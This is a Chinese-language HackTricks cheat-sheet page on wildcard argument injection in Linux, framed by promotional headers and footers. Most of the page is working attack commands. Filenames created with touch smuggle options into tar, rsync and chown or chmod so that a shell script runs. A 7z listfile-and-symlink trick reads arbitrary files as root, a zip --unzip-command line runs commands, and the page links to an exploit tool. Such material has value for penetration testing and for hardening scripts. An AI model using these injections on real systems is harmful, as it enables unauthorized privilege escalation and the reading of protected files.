5.4 KiB
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一个网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载HackTricks的PDF吗?请查看订阅计划!
-
发现我们的独家NFTs收藏品- The PEASS Family
-
加入 💬 Discord群组 或 电报群组 或 关注我在推特上的🐦@carlospolopm.
-
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。
chown, chmod
你可以指定你想要复制给其他文件的文件所有者和权限
touch "--reference=/my/own/path/filename"
您可以使用https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (组合攻击) 来利用此漏洞。
更多信息请参考https://www.exploit-db.com/papers/33930
Tar
执行任意命令:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
您可以使用https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar攻击) 来利用此漏洞。
更多信息请参考https://www.exploit-db.com/papers/33930
Rsync
执行任意命令:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
您可以使用https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (rsync攻击) 来利用此漏洞。
__更多信息请参考https://www.exploit-db.com/papers/33930
7z
在7z中,即使在*
之前使用--
(注意,--
表示后续的输入不能被视为参数,因此在这种情况下只能是文件路径),您也可以引发任意错误以读取文件,因此如果以root权限执行以下命令:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
而且你可以在执行此操作的文件夹中创建文件,你可以创建名为@root.txt
的文件,并将名为root.txt
的文件作为符号链接指向你想要读取的文件:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
然后,当执行7z时,它会将root.txt
视为一个包含应压缩文件列表的文件(这就是@root.txt
的存在所表示的),当7z读取root.txt
时,它将读取/file/you/want/to/read
的内容,由于该文件的内容不是文件列表,它将抛出错误并显示内容。
更多信息请参阅HackTheBox的CTF盒子的Write-ups。
Zip
执行任意命令:
zip name.zip files -T --unzip-command "sh -c whoami"
__
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载HackTricks的PDF吗?请查看订阅计划!
-
发现我们的独家NFTs收藏品The PEASS Family
-
加入 💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm.
-
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。